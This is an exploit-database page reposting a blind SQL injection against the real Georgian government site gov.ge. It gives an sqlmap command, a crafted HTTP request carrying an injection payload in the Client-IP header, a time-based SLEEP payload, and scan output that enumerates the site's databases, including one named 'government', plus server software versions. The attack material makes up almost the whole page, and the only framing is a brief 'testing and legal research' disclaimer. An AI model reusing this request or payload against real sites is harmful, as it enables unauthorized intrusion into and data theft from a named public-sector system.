Advertisement






Gov.ge Blind SQL İnjection

CVE Category Price Severity
Author Risk Exploitation Type Date
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020050165

Below is a copy:

Gov.ge Blind SQL njection
# Tested On : Kali Linux
# Contact : instagram.com/rootayyildiz/

sqlmap -r 1.txt --dbs --batch

GET /index.php HTTP/1.1
Referer: http://www.google.com/search?hl=en&q=testing
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Client-IP: -1' OR 3*2*1=6 AND 000552=000552 or 'Rg49ubhI'='
X-Forwarded-For: 127.0.0.1
X-Forwarded-Host: localhost
Accept-Language: en
Via: 1.1 wa.www.test.com
Origin: http://www.test.com/
X-Requested-With: XMLHttpRequest
Cookie: PHPSESSID=p65n0eag9th8uvlaf6598imb96; qtrans_front_language=en
Host: gov.ge
Connection: Keep-alive
Accept-Encoding: gzip,deflate
Accept: */*


Parameter: Client-IP #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: -1' OR 3 AND (SELECT 5851 FROM (SELECT(SLEEP(5)))CpHQ)-- msSN21=6 AND 000552=000552 or 'Rg49ubhI'='
---
[05:10:55] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.8
web application technology: Apache 2.2.15
back-end DBMS: MySQL >= 5.0.12
[05:10:55] [INFO] fetching database names
[05:10:55] [INFO] fetching number of databases
[05:10:55] [INFO] resumed: 2
[05:10:55] [INFO] resumed: information_schema
[05:10:55] [INFO] resumed: government
available databases [2]:
[*] government
[*] information_schema

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum